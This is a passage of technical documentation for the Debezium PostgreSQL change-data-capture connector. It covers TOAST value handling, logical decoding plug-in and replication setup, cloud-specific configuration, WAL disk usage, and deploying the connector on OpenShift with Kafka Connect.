http:\/\/www.opengeospatial.org\/standards\/sfa[Open Geospatial Consortium Simple Features Access specification].\n\n|===\n\n[id=\"postgresql-toasted-values\"]\n=== Toasted values\nPostgreSQL has a hard limit on the page size.\nThis means that values that are larger than around 8 KB need to be stored by using link:https:\/\/www.postgresql.org\/docs\/current\/storage-toast.html[TOAST storage].\nThis impacts replication messages that are coming from the database. Values that were stored by using the TOAST mechanism and that have not been changed are not included in the message, unless they are part of the table's replica identity.\nThere is no safe way for {prodname} to read the missing value out-of-band directly from the database, as this would potentially lead to race conditions. 
Consequently, {prodname} follows these rules to handle toasted values:\n\n* Tables with `REPLICA IDENTITY FULL` - TOAST column values are part of the `before` and `after` fields in change events just like any other column.\n* Tables with `REPLICA IDENTITY DEFAULT` - When receiving an `UPDATE` event from the database, any unchanged TOAST column value that is not part of the replica identity is not contained in the event.\nSimilarly, when receiving a `DELETE` event, no TOAST columns, if any, are in the `before` field.\nAs {prodname} cannot safely provide the column value in this case, the connector returns a placeholder value as defined by the connector configuration property `toasted.value.placeholder`.\n\nifdef::community[]\n[IMPORTANT]\n====\nThere is a problem related to Amazon RDS instances. The `wal2json` plug-in has evolved over time and there were releases that provided out-of-band toasted values. Amazon supports different versions of the plug-in for different PostgreSQL versions. See https:\/\/docs.aws.amazon.com\/AmazonRDS\/latest\/UserGuide\/CHAP_PostgreSQL.html[Amazon's documentation] to obtain the version-to-version mapping. For consistent toasted values handling:\n\n* Use the `pgoutput` plug-in for PostgreSQL 10+ instances.\n* Set `include-unchanged-toast=0` for older versions of the `wal2json` plug-in by using the `slot.stream.params` configuration option.\n====\nendif::community[]\n\n\/\/ Type: assembly\n\/\/ ModuleID: setting-up-postgresql-to-run-a-debezium-connector\n\/\/ Title: Setting up PostgreSQL to run a {prodname} connector\n[[setting-up-postgresql]]\n== Set up\n\nifdef::community[]\nBefore using the PostgreSQL connector to monitor the changes committed on a PostgreSQL server, decide which logical decoding plug-in you intend to use.\nIf you plan *not* to use the native `pgoutput` logical replication stream support, then you must install the logical decoding plug-in into the PostgreSQL server. Afterward, enable a replication slot, and configure a user with sufficient privileges to perform the replication.\n\nIf your database is hosted by a service such as link:https:\/\/www.heroku.com\/postgres[Heroku Postgres] you might be unable to install the plug-in. If so, and if you are using PostgreSQL 10+, you can use the `pgoutput` decoder support to capture changes in your database. If that is not an option, you are unable to use {prodname} with your database.\nendif::community[]\n\nifdef::product[]\nThis release of {prodname} supports only the native `pgoutput` logical replication stream. To set up PostgreSQL so that it uses the `pgoutput` plug-in, you must enable a replication slot, and configure a user with sufficient privileges to perform the replication.\n\nDetails are in the following topics:\n\n* xref:configuring-a-replication-slot-for-the-debezium-pgoutput-plug-in[]\n* xref:setting-up-postgresql-permissions-required-by-debezium-connectors[]\n* xref:setting-privileges-to-permit-debezium-user-to-create-postgresql-publications[]\n* xref:configuring-postgresql-to-allow-replication-with-the-connector-host[]\n* xref:configuring-postgresql-to-manage-debezium-wal-disk-space-consumption[]\n\nendif::product[]\n\nifdef::product[]\n\n\/\/ Type: concept\n\/\/ ModuleID: configuring-a-replication-slot-for-the-debezium-pgoutput-plug-in\n\/\/ Title: Configuring a replication slot for the {prodname} `pgoutput` plug-in\n=== Configuring replication slot\n\nPostgreSQL's logical decoding uses replication slots. 
To configure a replication slot, specify the following in the `postgresql.conf` file:\n\n[source]\n----\nwal_level=logical\nmax_wal_senders=1\nmax_replication_slots=1\n----\n\nThese settings instruct the PostgreSQL server as follows:\n\n* `wal_level` - Use logical decoding with the write-ahead log.\n* `max_wal_senders` - Use a maximum of one separate process for processing WAL changes.\n* `max_replication_slots` - Allow a maximum of one replication slot to be created for streaming WAL changes.\n\nReplication slots are guaranteed to retain all WAL entries that are required for {prodname} even during {prodname} outages. Consequently, it is important to closely monitor replication slots to avoid:\n\n* Too much disk consumption\n* Any conditions, such as catalog bloat, that can happen if a replication slot stays unused for too long\n\nFor more information, see the link:https:\/\/www.postgresql.org\/docs\/current\/warm-standby.html#STREAMING-REPLICATION-SLOTS[PostgreSQL documentation for replication slots].\n\n[NOTE]\n====\nFamiliarity with the mechanics and link:https:\/\/www.postgresql.org\/docs\/current\/static\/wal-configuration.html[configuration of the PostgreSQL write-ahead log] is helpful for using the {prodname} PostgreSQL connector.\n====\nendif::product[]\n\nifdef::community[]\n[[postgresql-in-the-cloud]]\n=== PostgreSQL in the Cloud\n\n[[postgresql-on-amazon-rds]]\n==== PostgreSQL on Amazon RDS\n\nIt is possible to capture changes in a PostgreSQL database that is running in link:https:\/\/aws.amazon.com\/rds\/[Amazon RDS]. To do this:\n\n* Set the instance parameter `rds.logical_replication` to `1`.\n* Verify that the `wal_level` parameter is set to `logical` by running the query `SHOW wal_level` as the database RDS master user, as shown in the sketch after this list.\n This might not be the case in multi-zone replication setups.\n You cannot set this option manually.\n It is link:https:\/\/docs.aws.amazon.com\/AmazonRDS\/latest\/UserGuide\/USER_WorkingWithParamGroups.html[automatically changed] when the `rds.logical_replication` parameter is set to `1`.\n If the `wal_level` is not set to `logical` after you make the preceding change, it is probably because the instance has to be restarted after the parameter group change.\n Restarts occur during your maintenance window, or you can initiate a restart manually.\n* Set the {prodname} `plugin.name` parameter to `wal2json`. You can skip this on PostgreSQL 10+ if you plan to use `pgoutput` logical replication stream support.\n* Initiate logical replication from an AWS account that has the `rds_replication` role.\n The role grants permissions to manage logical slots and to stream data using logical slots.\n By default, only the master user account on AWS has the `rds_replication` role on Amazon RDS.\n To enable a user account other than the master account to initiate logical replication, you must grant the account the `rds_replication` role.\n For example, `grant rds_replication to _<my_user>_`. You must have `superuser` access to grant the `rds_replication` role to a user.\n To enable accounts other than the master account to create an initial snapshot, you must grant `SELECT` permission to the accounts on the tables to be captured.\n For more information about security for PostgreSQL logical replication, see the link:https:\/\/www.postgresql.org\/docs\/current\/logical-replication-security.html[PostgreSQL documentation].\n
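\nA minimal verification sketch (run as the RDS master user; the expected output is shown as a comment):\n\n[source,sql,indent=0]\n----\n-- Confirm that logical decoding is enabled on the instance.\nSHOW wal_level;\n-- Expected result: logical\n----\n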
\n[IMPORTANT]\n====\nEnsure that you use the latest versions of PostgreSQL 9.6, 10 or 11 on Amazon RDS.\nOtherwise, older versions of the `wal2json` plug-in might be installed.\nSee https:\/\/docs.aws.amazon.com\/AmazonRDS\/latest\/UserGuide\/CHAP_PostgreSQL.html[the official documentation] for the exact `wal2json` versions installed on Amazon RDS.\nIn the case of an older version, replication messages received from the database might not contain complete information about type constraints such as length or scale or `NULL`\/`NOT NULL`. This might cause creation of messages with an inconsistent schema for a short period of time when there are changes to a column's definition.\n\nAs of January 2019, the following PostgreSQL versions on RDS come with an up-to-date version of `wal2json` and thus should be used:\n\n* PostgreSQL 9.6: 9.6.10 and newer\n* PostgreSQL 10: 10.5 and newer\n* PostgreSQL 11: any version\n====\n\n[[postgresql-on-azure]]\n==== PostgreSQL on Azure\n\nIt is possible to use {prodname} with link:https:\/\/docs.microsoft.com\/azure\/postgresql\/[Azure Database for PostgreSQL], which supports the `wal2json` and `pgoutput` plug-ins; both are supported by {prodname}.\n\nSet the Azure replication support to `logical`. You can use the link:https:\/\/docs.microsoft.com\/en-us\/azure\/postgresql\/concepts-logical#using-azure-cli[Azure CLI] or the link:https:\/\/docs.microsoft.com\/en-us\/azure\/postgresql\/concepts-logical#using-azure-portal[Azure Portal] to configure this. For example, to use the Azure CLI, here are the link:https:\/\/docs.microsoft.com\/cli\/azure\/postgres\/server?view=azure-cli-latest[`az postgres server`] commands that you need to execute:\n\n[source,shell]\n----\naz postgres server configuration set --resource-group mygroup --server-name myserver --name azure.replication_support --value logical\n\naz postgres server restart --resource-group mygroup --name myserver\n----\n\n[[postgresql-on-crunchybridge]]\n==== PostgreSQL on CrunchyBridge\n\nIt is possible to use {prodname} with link:https:\/\/crunchybridge.com\/[CrunchyBridge]; logical replication is already turned on and the `pgoutput` plug-in is available. You must create a replication user and grant it the correct privileges.\n\n[IMPORTANT]\n====\nWhile using the `pgoutput` plug-in, it is recommended that you configure `filtered` as the {link-prefix}:{link-postgresql-connector}#postgresql-publication-autocreate-mode[`publication.autocreate.mode`]. 
If you use `all_tables`, which is the default value for `publication.autocreate.mode`, and the publication is not found, the connector tries to create one by using `CREATE PUBLICATION <publication_name> FOR ALL TABLES;`, but this fails due to lack of permissions.\n====\n\n[[installing-postgresql-output-plugin]]\n=== Installing the logical decoding output plug-in\n\n[TIP]\n====\nSee {link-prefix}:{link-postgresql-plugins}[Logical Decoding Output Plug-in Installation for PostgreSQL] for more detailed instructions for setting up and testing logical decoding plug-ins.\n====\n\n[NOTE]\n====\nAs of {prodname} 0.10, the connector supports PostgreSQL 10+ logical replication streaming by using `pgoutput`.\nThis means that a logical decoding output plug-in is no longer necessary and changes can be emitted directly from the replication stream by the connector.\n====\n\nAs of PostgreSQL 9.4, the only way to read changes to the write-ahead log is to install a logical decoding output plug-in. Plug-ins are written in C, compiled, and installed on the machine that runs the PostgreSQL server. Plug-ins use a number of PostgreSQL-specific APIs, as described by the link:https:\/\/www.postgresql.org\/docs\/current\/static\/logicaldecoding-output-plugin.html[PostgreSQL documentation].\n\nThe PostgreSQL connector works with one of {prodname}'s supported logical decoding plug-ins to encode the changes in either link:https:\/\/github.com\/google\/protobuf[Protobuf format] or link:http:\/\/www.json.org\/[JSON] format.\nSee the documentation for your chosen plug-in to learn more about the plug-in's requirements, limitations, and how to compile it.\n\n* link:https:\/\/github.com\/debezium\/postgres-decoderbufs\/blob\/master\/README.md[`protobuf`]\n* link:https:\/\/github.com\/eulerto\/wal2json\/blob\/master\/README.md[`wal2json`]\n\nFor simplicity, {prodname} also provides a Docker image based on a vanilla PostgreSQL server image on top of which it compiles and installs the plug-ins. You can link:https:\/\/github.com\/debezium\/docker-images\/tree\/master\/postgres\/9.6[use this image] as an example of the detailed steps required for the installation.\n\n[WARNING]\n====\nThe {prodname} logical decoding plug-ins have been installed and tested on only Linux machines. For Windows and other operating systems, different installation steps might be required.\n====\n\n[[postgresql-differences-between-plugins]]\n=== Plug-in differences\n\nPlug-in behavior is not completely the same for all cases.\nThese differences have been identified:\n\n* The `wal2json` and `decoderbufs` plug-ins emit events for tables without primary keys.\n* The `wal2json` plug-in does not support special values, such as `NaN` or `infinity`, for floating point types.\n* The `wal2json` plug-in should be used with the `schema.refresh.mode` connector configuration property set to `columns_diff_exclude_unchanged_toast`. Otherwise, when receiving a change event for a row that contains an unchanged `TOAST` column, no field for that column is contained in the emitted change event's `after` field. This is because `wal2json` plug-in messages do not contain a field for such a column.\n+\nThe requirement for adding this is tracked under link:https:\/\/github.com\/eulerto\/wal2json\/issues\/98[`wal2json` issue 98].\nSee the documentation of `columns_diff_exclude_unchanged_toast` further below for implications of using it.\n\n* The `pgoutput` plug-in does not emit all events for tables without primary keys. 
It emits only events for `INSERT` operations.\n\nAll up-to-date differences are tracked in a test suite link:https:\/\/github.com\/debezium\/debezium\/blob\/master\/debezium-connector-postgres\/src\/test\/java\/io\/debezium\/connector\/postgresql\/DecoderDifferences.java[Java class].\n\n[[postgresql-server-configuration]]\n=== Configuring the PostgreSQL server\n\nIf you are using a {link-prefix}:{link-postgresql-connector}#postgresql-output-plugin[logical decoding plug-in] other than pgoutput, after installing it, configure the PostgreSQL server as follows:\n\n. To load the plug-in at startup, add the following to the `postgresql.conf` file:\n+\n[source,properties]\n----\n# MODULES\nshared_preload_libraries = 'decoderbufs,wal2json' \/\/ <1>\n----\n<1> Instructs the server to load the `decoderbufs` and `wal2json` logical decoding plug-ins at startup. The names of the plug-ins are set in the link:https:\/\/github.com\/debezium\/postgres-decoderbufs\/blob\/v0.3.0\/Makefile[`Protobuf`] and link:https:\/\/github.com\/eulerto\/wal2json\/blob\/master\/Makefile[`wal2json`] make files.\n\n. To configure the replication slot regardless of the decoder being used, specify the following in the `postgresql.conf` file:\n+\n[source,properties]\n----\n# REPLICATION\nwal_level = logical \/\/ <1>\nmax_wal_senders = 1 \/\/ <2>\nmax_replication_slots = 1 \/\/ <3>\n----\n<1> Instructs the server to use logical decoding with the write-ahead log.\n<2> Instructs the server to use a maximum of `1` separate process for processing WAL changes.\n<3> Instructs the server to allow a maximum of `1` replication slot to be created for streaming WAL changes.\n\n{prodname} uses PostgreSQL's logical decoding, which uses replication slots.\nReplication slots are guaranteed to retain all WAL segments required for {prodname} even during {prodname} outages. For this reason, it is important to closely monitor replication slots to avoid excessive disk consumption and other conditions, such as catalog bloat, that can occur if a replication slot stays unused for too long.\nFor more information, see the link:https:\/\/www.postgresql.org\/docs\/current\/warm-standby.html#STREAMING-REPLICATION-SLOTS[PostgreSQL streaming replication documentation].\n
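\nFor example, the following query (a sketch; slot names depend on your connector configuration) shows how you might inspect slot progress:\n\n[source,sql,indent=0]\n----\n-- restart_lsn is the oldest WAL position the slot can still require;\n-- confirmed_flush_lsn is the position up to which the consumer has\n-- confirmed receipt. A growing gap can indicate retained WAL.\nSELECT slot_name, plugin, active, restart_lsn, confirmed_flush_lsn\nFROM pg_replication_slots;\n----\n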
\nIf you are working with a `synchronous_commit` setting other than `on`,\nthe recommendation is to set `wal_writer_delay` to a value such as 10 milliseconds to achieve a low latency of change events.\nOtherwise, its default value is applied, which adds a latency of about 200 milliseconds.\n\n[TIP]\n====\nReading and understanding link:https:\/\/www.postgresql.org\/docs\/current\/static\/wal-configuration.html[PostgreSQL documentation about the mechanics and configuration of the PostgreSQL write-ahead log] is strongly recommended.\n====\nendif::community[]\n\n\/\/ Type: procedure\n\/\/ ModuleID: setting-up-postgresql-permissions-required-by-debezium-connectors\n\/\/ Title: Setting up PostgreSQL permissions for the {prodname} connector\n[[postgresql-permissions]]\n=== Setting up permissions\n\nSetting up a PostgreSQL server to run a {prodname} connector requires a database user that can perform replication.\nReplication can be performed only by a database user that has appropriate permissions and only for a configured number of hosts.\n\nAlthough, by default, superusers have the necessary `REPLICATION` and `LOGIN` roles, as mentioned in xref:postgresql-security[Security], it is best not to provide the {prodname} replication user with elevated privileges.\nInstead, create a {prodname} user that has the minimum required privileges.\n\n.Prerequisites\n\n* PostgreSQL administrative permissions.\n\n.Procedure\n\n. 
To provide a user with replication permissions, define a PostgreSQL role that has _at least_ the `REPLICATION` and `LOGIN` permissions, and then grant that role to the user.\n For example:\n+\n[source,sql,subs=\"+quotes\"]\n----\nCREATE ROLE __<name>__ REPLICATION LOGIN;\n----\n\n\/\/ Type: procedure\n\/\/ ModuleID: setting-privileges-to-permit-debezium-user-to-create-postgresql-publications\n\/\/ Title: Setting privileges to enable {prodname} to create PostgreSQL publications\n[[postgresql-replication-user-privileges]]\n=== Setting privileges to enable {prodname} to create PostgreSQL publications when you use `pgoutput`\n\nifdef::community[]\nIf you use `pgoutput` as the logical decoding plugin, {prodname} must operate in the database as a user with specific privileges.\nendif::community[]\n\n{prodname} streams change events for PostgreSQL source tables from _publications_ that are created for the tables.\nPublications contain a filtered set of change events that are generated from one or more tables.\nThe data in each publication is filtered based on the publication specification.\nThe specification can be created by the PostgreSQL database administrator or by the {prodname} connector.\nTo permit the {prodname} PostgreSQL connector to create publications and specify the data to replicate to them, the connector must operate with specific privileges in the database.\n\nThere are several options for determining how publications are created.\nIn general, it is best to manually create publications for the tables that you want to capture, before you set up the connector; a sketch of doing so follows the procedure below.\nHowever, you can configure your environment in a way that permits {prodname} to create publications automatically, and to specify the data that is added to them.\n\n{prodname} uses include list and exclude list properties to specify how data is inserted in the publication.\nFor more information about the options for enabling {prodname} to create publications, see {link-prefix}:{link-postgresql-connector}#postgresql-publication-autocreate-mode[`publication.autocreate.mode`].\n\nFor {prodname} to create a PostgreSQL publication, it must run as a user that has the following privileges:\n\n* Replication privileges in the database to add the table to a publication.\n* `CREATE` privileges on the database to add publications.\n* `SELECT` privileges on the tables to copy the initial table data. Table owners automatically have `SELECT` permission for the table.\n\nTo add tables to a publication, the user must be an owner of the table.\nBut because the source table already exists, you need a mechanism to share ownership with the original owner.\nTo enable shared ownership, you create a PostgreSQL replication group, and then add the existing table owner and the replication user to the group.\n\n.Procedure\n\n. Create a replication group.\n+\n[source,sql,subs=\"+quotes\"]\n----\nCREATE ROLE __<replication_group>__;\n----\n. Add the original owner of the table to the group.\n+\n[source,sql,subs=\"+quotes\"]\n----\nGRANT __<replication_group>__ TO __<original_owner>__;\n----\n. Add the {prodname} replication user to the group.\n+\n[source,sql,subs=\"+quotes\"]\n----\nGRANT __<replication_group>__ TO __<replication_user>__;\n----\n. Transfer ownership of the table to `__<replication_group>__`.\n+\n[source,sql,subs=\"+quotes\"]\n----\nALTER TABLE __<table_name>__ OWNER TO __<replication_group>__;\n----\n
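\nIf you create the publication manually, a minimal sketch looks like the following; the publication name `dbz_publication` matches the connector's default `publication.name` value, and the table list is illustrative:\n\n[source,sql,indent=0]\n----\n-- Create a publication for only the tables that you want to capture.\nCREATE PUBLICATION dbz_publication FOR TABLE public.customers;\n\n-- Verify which tables the publication includes.\nSELECT * FROM pg_publication_tables WHERE pubname = 'dbz_publication';\n----\n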
// Type: procedure
// ModuleID: configuring-postgresql-to-allow-replication-with-the-connector-host
[[postgresql-host-replication-permissions]]
=== Configuring PostgreSQL to allow replication with the {prodname} connector host

To enable {prodname} to replicate PostgreSQL data, you must configure the database to permit replication with the host that runs the PostgreSQL connector.
To specify the clients that are permitted to replicate with the database, add entries to the PostgreSQL host-based authentication file, `pg_hba.conf`.
For more information about the `pg_hba.conf` file, see link:https://www.postgresql.org/docs/10/auth-pg-hba-conf.html[the PostgreSQL documentation].

.Procedure

* Add entries to the `pg_hba.conf` file to specify the {prodname} connector hosts that can replicate with the database host.
For example,
+
.`pg_hba.conf` file example:
[source]
----
local replication <youruser> trust // <1>
host replication <youruser> 127.0.0.1/32 trust // <2>
host replication <youruser> ::1/128 trust // <3>
----
<1> Instructs the server to allow replication for `<youruser>` locally, that is, on the server machine.
<2> Instructs the server to allow `<youruser>` on `localhost` to receive replication changes using `IPV4`.
<3> Instructs the server to allow `<youruser>` on `localhost` to receive replication changes using `IPV6`.

[NOTE]
====
For more information about network masks, see link:https://www.postgresql.org/docs/current/static/datatype-net-types.html[the PostgreSQL documentation].
====
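
With these entries in place, one way to confirm that a connector host's replication connection is accepted is to query the standard `pg_stat_replication` view on the server after the connector starts. This is an optional sanity check, not a required step:

[source,sql]
----
-- Lists active replication connections, including the client address
-- and the state of each connection.
SELECT client_addr, usename, state
FROM pg_stat_replication;
----
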
ifdef::community[]
[[supported-postgresql-topologies]]
=== Supported PostgreSQL topologies

The PostgreSQL connector can be used with a standalone PostgreSQL server or with a cluster of PostgreSQL servers.

As mentioned {link-prefix}:{link-postgresql-connector}#postgresql-limitations[in the beginning], PostgreSQL (for all versions <= 12) supports logical replication slots on only `primary` servers. This means that a replica in a PostgreSQL cluster cannot be configured for logical replication, and consequently that the {prodname} PostgreSQL connector can connect and communicate with only the primary server. Should this server fail, the connector stops. When the cluster is repaired, if the original primary server is once again promoted to `primary`, you can restart the connector. However, if a different PostgreSQL server _with the plug-in and proper configuration_ is promoted to `primary`, you must change the connector configuration to point to the new `primary` server and then restart the connector.
endif::community[]

// Type: concept
// ModuleID: configuring-postgresql-to-manage-debezium-wal-disk-space-consumption
// Title: Configuring PostgreSQL to manage {prodname} WAL disk space consumption
[[postgresql-wal-disk-space]]
=== WAL disk space consumption

In certain cases, it is possible for PostgreSQL disk space consumed by WAL files to spike or increase out of usual proportions.
There are several possible reasons for this situation:

* The LSN up to which the connector has received data is available in the `confirmed_flush_lsn` column of the server's `pg_replication_slots` view (see the sample query after this list). Data that is older than this LSN is no longer available, and the database is responsible for reclaiming the disk space.
+
Also in the `pg_replication_slots` view, the `restart_lsn` column contains the LSN of the oldest WAL that the connector might require. If the value for `confirmed_flush_lsn` is regularly increasing and the value of `restart_lsn` lags behind it, the database needs to reclaim the space.
+
The database typically reclaims disk space in batch blocks. This is expected behavior and no action by a user is necessary.

* There are many updates in a database that is being tracked but only a tiny number of updates are related to the table(s) and schema(s) for which the connector is capturing changes. This situation can be easily solved with periodic heartbeat events. Set the {link-prefix}:{link-postgresql-connector}#postgresql-property-heartbeat-interval-ms[`heartbeat.interval.ms`] connector configuration property.

* The PostgreSQL instance contains multiple databases and one of them is a high-traffic database. {prodname} captures changes in another database that is low-traffic in comparison to the other database. {prodname} then cannot confirm the LSN because replication slots work per-database and {prodname} is not invoked. As WAL is shared by all databases, the amount used tends to grow until an event is emitted by the database for which {prodname} is capturing changes. To overcome this, it is necessary to:

** Enable periodic heartbeat record generation with the `heartbeat.interval.ms` connector configuration property.
** Regularly emit change events from the database for which {prodname} is capturing changes.
ifdef::community[]

+
In the case of the `wal2json` decoder plug-in, it is sufficient to generate empty events. This can be achieved for example by truncating an empty temporary table. For other decoder plug-ins, the recommendation is to create a supplementary table for which {prodname} is not capturing changes.
endif::community[]

+
A separate process would then periodically update the table by either inserting a new row or repeatedly updating the same row.
PostgreSQL then invokes {prodname}, which confirms the latest LSN and allows the database to reclaim the WAL space.
This task can be automated by means of the {link-prefix}:{link-postgresql-connector}#postgresql-property-heartbeat-action-query[`heartbeat.action.query`] connector configuration property.
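
The sample query mentioned in the list above: you can watch slot progress directly in `pg_replication_slots`. The view and columns are standard PostgreSQL; the slot name `debezium` is the connector default and is used here for illustration:

[source,sql]
----
-- Compare the position the connector has confirmed (confirmed_flush_lsn)
-- with the oldest WAL position the slot still retains (restart_lsn).
SELECT slot_name, active, restart_lsn, confirmed_flush_lsn
FROM pg_replication_slots
WHERE slot_name = 'debezium';
----
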
ifdef::community[]
[TIP]
====
For users on AWS RDS with PostgreSQL, a situation similar to the high-traffic/low-traffic scenario can occur in an idle environment.
AWS RDS causes writes to its own system tables to be invisible to clients on a frequent basis (5 minutes).
Again, regularly emitting events solves the problem.
====
endif::community[]

// Type: assembly
// ModuleID: deployment-of-debezium-postgresql-connectors
// Title: Deployment of {prodname} PostgreSQL connectors
[[postgresql-deployment]]
== Deployment

ifdef::community[]
With link:https://zookeeper.apache.org[Zookeeper], link:http://kafka.apache.org/[Kafka], and {link-kafka-docs}.html#connect[Kafka Connect] installed, the remaining tasks to deploy a {prodname} PostgreSQL connector are to download the link:https://repo1.maven.org/maven2/io/debezium/debezium-connector-postgres/{debezium-version}/debezium-connector-postgres-{debezium-version}-plugin.tar.gz[connector's plug-in archive], extract the JAR files into your Kafka Connect environment, and add the directory with the JAR files to {link-kafka-docs}/#connectconfigs[Kafka Connect's `plugin.path`]. You then need to restart your Kafka Connect process to pick up the new JAR files.

If you are working with immutable containers, see link:https://hub.docker.com/r/debezium/[{prodname}'s container images] for Zookeeper, Kafka, PostgreSQL, and Kafka Connect with the PostgreSQL connector already installed and ready to run. You can also xref:operations/openshift.adoc[run {prodname} on Kubernetes and OpenShift].
endif::community[]

ifdef::product[]
To deploy a {prodname} PostgreSQL connector, add the connector files to Kafka Connect, create a custom container to run the connector, and add connector configuration to your container. Details are in the following topics:

* xref:deploying-debezium-postgresql-connectors[]
* xref:descriptions-of-debezium-postgresql-connector-configuration-properties[]

// Type: procedure
// ModuleID: deploying-debezium-postgresql-connectors
// Title: Deploying {prodname} PostgreSQL connectors
[[postgresql-deploying-a-connector]]
=== Deploying connectors

To deploy a {prodname} PostgreSQL connector, you need to build a custom Kafka Connect container image that contains the {prodname} connector archive, and then push this container image to a container registry. You then need to create two custom resources (CRs):

* A `KafkaConnect` CR that configures your Kafka Connect instance and that specifies the name of the image that you created to run your {prodname} connector. You apply this CR to the OpenShift Kafka instance.

* A `KafkaConnector` CR that configures your {prodname} PostgreSQL connector. You apply this CR to the OpenShift instance where Red Hat AMQ Streams is deployed.

.Prerequisites

* PostgreSQL is running and you performed the steps to {LinkDebeziumUserGuide}#setting-up-postgresql-to-run-a-debezium-connector[set up PostgreSQL to run a {prodname} connector].

* link:https://access.redhat.com/products/red-hat-amq#streams[Red Hat AMQ Streams] was used to set up and start running Apache Kafka and Kafka Connect on OpenShift. AMQ Streams offers operators and images that bring Kafka to OpenShift.

* Podman or Docker is installed.

* You have an account and permissions to create and manage containers in the container registry (such as `quay.io` or `docker.io`) to which you plan to add the container that will run your {prodname} connector.

.Procedure

. Create the {prodname} PostgreSQL container for Kafka Connect:
.. Download the {prodname} link:https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=red.hat.integration&downloadType=distributions[PostgreSQL connector archive].

.. Extract the {prodname} PostgreSQL connector archive to create a directory structure for the connector plug-in, for example:
+
[subs="+macros"]
----
./my-plugins/
├── debezium-connector-postgresql
│   ├── ...
----

.. Create a Docker file that uses `{DockerKafkaConnect}` as the base image.
For example, from a terminal window, enter the following:
+
[subs="+macros,+attributes"]
----
pass:quotes[*cat <<EOF >debezium-container-for-postgresql.yaml*] // <1>
pass:quotes[*FROM {DockerKafkaConnect}*]
pass:quotes[*USER root:root*]
pass:quotes[*COPY ./my-plugins/ /opt/kafka/plugins/*] // <2>
pass:quotes[*USER 1001*]
pass:quotes[*EOF*]
----
<1> You can specify any file name that you want.
<2> Replace `my-plugins` with the name of your plug-ins directory.
+
The command creates a Docker file with the name `debezium-container-for-postgresql.yaml` in the current directory.

.. Build the container image from the `debezium-container-for-postgresql.yaml` Docker file that you created in the previous step. From the directory that contains the file, run the following command:
+
[source,shell,options="nowrap"]
----
podman build -t debezium-container-for-postgresql:latest .
----
+
This command builds a container image with the name `debezium-container-for-postgresql`.

.. Push your custom image to a container registry such as `quay.io` or any internal container registry. Ensure that this registry is reachable from your OpenShift instance. For example:
+
[source,shell,options="nowrap"]
----
podman push debezium-container-for-postgresql:latest
----

.. Create a new {prodname} PostgreSQL `KafkaConnect` custom resource (CR). For example, create a `KafkaConnect` CR with the name `dbz-connect.yaml` that specifies `annotations` and `image` properties as shown in the following example:
+
[source,yaml,subs="+attributes"]
----
apiVersion: {KafkaConnectApiVersion}
kind: KafkaConnect
metadata:
  name: my-connect-cluster
  annotations:
    strimzi.io/use-connector-resources: "true" // <1>
spec:
  image: debezium-container-for-postgresql // <2>
----
<1> `metadata.annotations` indicates to the Cluster Operator that `KafkaConnector` resources are used to configure connectors in this Kafka Connect cluster.
<2> `spec.image` specifies the name of the image that you created to run your {prodname} connector. This property overrides the `STRIMZI_DEFAULT_KAFKA_CONNECT_IMAGE` variable in the Cluster Operator.

.. Apply your `KafkaConnect` CR to the OpenShift Kafka instance by running the following command:
+
[source,shell,options="nowrap"]
----
oc create -f dbz-connect.yaml
----
+
This updates your Kafka Connect environment in OpenShift to add a Kafka Connector instance that specifies the name of the image that you created to run your {prodname} connector.

. Create a `KafkaConnector` custom resource that configures your {prodname} PostgreSQL connector instance.
+
You configure a {prodname} PostgreSQL connector in a `.yaml` file that sets connector configuration properties.
A connector configuration might instruct {prodname} to produce events for a subset of the schemas and tables, or it might set properties so that {prodname} ignores, masks, or truncates values in specified columns that are sensitive, too large, or not needed. See the {link-prefix}:{link-postgresql-connector}#postgresql-connector-properties[complete list of PostgreSQL connector properties] that can be specified in these configurations.
+
The following example configures a {prodname} connector that connects to a PostgreSQL server host, `192.168.99.100`, on port `5432`. This host has a database named `sampledb`, a schema named `public`, and `fulfillment` is the server's logical name.
+
.`fulfillment-connector.yaml`
[source,yaml,options="nowrap",subs="+attributes"]
----
apiVersion: {KafkaConnectorApiVersion}
kind: KafkaConnector
metadata:
  name: fulfillment-connector // <1>
  labels:
    strimzi.io/cluster: my-connect-cluster
spec:
  class: io.debezium.connector.postgresql.PostgresConnector
  tasksMax: 1 // <2>
  config: // <3>
    database.hostname: 192.168.99.100 // <4>
    database.port: 5432
    database.user: debezium
    database.password: dbz
    database.dbname: sampledb
    database.server.name: fulfillment // <5>
    schema.include.list: public // <6>
    plugin.name: pgoutput // <7>
----
<1> The name of the connector.
<2> Only one task should operate at any one time.
Because the PostgreSQL connector reads the PostgreSQL server's write-ahead log (WAL),
using a single connector task ensures proper order and event handling.
The Kafka Connect service uses connectors to start one or more tasks that do the work,
and it automatically distributes the running tasks across the cluster of Kafka Connect services.
If any of the services stop or crash,
those tasks will be redistributed to running services.
<3> The connector's configuration.
<4> The name of the database host that is running the PostgreSQL server. In this example, the database host name is `192.168.99.100`.
<5> A unique server name.
The server name is the logical identifier for the PostgreSQL server or cluster of servers.
This name is used as the prefix for all Kafka topics that receive change event records.
<6> The connector captures changes in only the `public` schema. It is possible to configure the connector to capture changes in only the tables that you choose. See the {link-prefix}:{link-postgresql-connector}#postgresql-property-table-include-list[`table.include.list` connector configuration property].
<7> The name of the PostgreSQL {link-prefix}:{link-postgresql-connector}#postgresql-output-plugin[logical decoding plug-in] installed on the PostgreSQL server. Although `pgoutput` is the only supported value for PostgreSQL 10 and later, you must still explicitly set `plugin.name` to `pgoutput`.

. Create your connector instance with Kafka Connect. For example, if you saved your `KafkaConnector` resource in the `fulfillment-connector.yaml` file, you would run the following command:
+
[source,shell,options="nowrap"]
----
oc apply -f fulfillment-connector.yaml
----
+
This registers `fulfillment-connector` and the connector starts to run against the `sampledb` database as defined in the `KafkaConnector` CR.

. Verify that the connector was created and has started:
.. Display the Kafka Connect log output to verify that the connector was created and has started to capture changes in the specified database:
+
[source,shell,options="nowrap"]
----
oc logs $(oc get pods -o name -l strimzi.io/cluster=my-connect-cluster)
----

.. Review the log output to verify that the initial snapshot has been executed. You should see something like this:
+
[source,shell,options="nowrap"]
----
... INFO Starting snapshot for ...
... INFO Snapshot is using user 'debezium' ...
----
+
If the connector starts correctly without errors, it creates a topic for each table whose changes the connector is capturing. For the example CR, there would be a topic for each table in the `public` schema. Downstream applications can subscribe to these topics.

.. Verify that the connector created the topics by running the following command:
+
[source,shell,options="nowrap"]
----
oc get kafkatopics
----

.Results

